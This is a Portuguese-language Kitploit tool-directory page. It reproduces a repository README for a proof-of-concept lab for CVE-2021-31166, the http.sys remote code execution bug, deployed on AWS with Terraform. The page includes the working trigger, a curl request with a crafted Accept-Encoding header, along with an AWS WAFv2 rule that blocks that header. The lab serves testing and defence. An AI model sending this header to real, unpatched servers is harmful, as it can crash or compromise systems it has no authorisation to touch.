Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
WIn-CVE-2021-31166 — Prova de conceito para CVE-2021-31166 (http.sys RCE) com implantação via Terraform na AWS, incluindo scripts de teste e uma regra WAFv2 para bloquear o exploit. | Kitploit
Ferramentas/GitHubGitHub/bgsilvait/win-cve-2021-31166
Análise de VulnerabilidadesExploraçãoEvasão de IDS/IPSSegurança WebSegurança na NuvemDevSecOps
GitHubbgsilvait/win-cve-2021-31166

WIn-CVE-2021-31166

Prova de conceito para CVE-2021-31166 (http.sys RCE) com implantação via Terraform na AWS, incluindo scripts de teste e uma regra WAFv2 para bloquear o exploit.

Ver Repositório
2há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

WIn-CVE-2021-31166

Este Repositório é inspirado no 0vercl0k para uma prova de conceito da CVE-2021-31166 ("Vulnerabilidade de Execução Remota de Código na Pilha de Protocolo HTTP"), uma desreferência de use-after-free no http.sys corrigida pela Microsoft em maio de 2021.

Infraestrutura de Build

root@kitploit:~
git clone https://github.com/bgsilvait/WIn-CVE-2021-31166.git
cd WIn-CVE-2021-31166
terraform init
terraform plan
terraform apply --auto-approve

O terraform criará uma instância EC2 com Windows Server Core 20H2, instalará o IIS e adicionará permissões SSM para abrir uma Sessão Web Powershell do Console AWS. Também criará um e usará a instância como destino. Por padrão, o adicionará apenas como permitido para acesso em .

Application Load Balancer
Security Group
SEU IP
HTTP

Obter valores

root@kitploit:~
#Define Values from Terraform Output
ALB=$(terraform output -raw lb_dns_name)
EC2IP=$(terraform output -json public_ip | jq -r '.[0]')

Testando Conectividade

root@kitploit:~
#Testing to ALB
while true; do curl -I $ALB --connect-timeout 1 ; done

#Testing Directly to EC2'
while true; do curl -I $EC2IP --connect-timeout 1 ; done

Injetar Cabeçalho CVE

root@kitploit:~
#Testing to ALB
curl -i $ALB -H "Accept-Encoding: doar-e, ftw, imo, ,"

#Testing Directly to EC2'
curl -i $EC2IP -H "Accept-Encoding: doar-e, ftw, imo, ,"

Regra para Bloqueio no AWS WAFv2

root@kitploit:~
{
  "Name": "cve-block",
  "Priority": 0,
  "Statement": {
    "ByteMatchStatement": {
      "SearchString": "doar-e, ftw, imo, ,",
      "FieldToMatch": {
        "SingleHeader": {
          "Name": "accept-encoding"
        }
      },
      "TextTransformations": [
        {
          "Priority": 0,
          "Type": "NONE"
        }
      ],
      "PositionalConstraint": "EXACTLY"
    }
  },
  "Action": {
    "Block": {
      "CustomResponse": {
        "ResponseCode": 418,
        "CustomResponseBodyKey": "418"
      }
    }
  },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "cve-block"
  }
}
Baixar ferramenta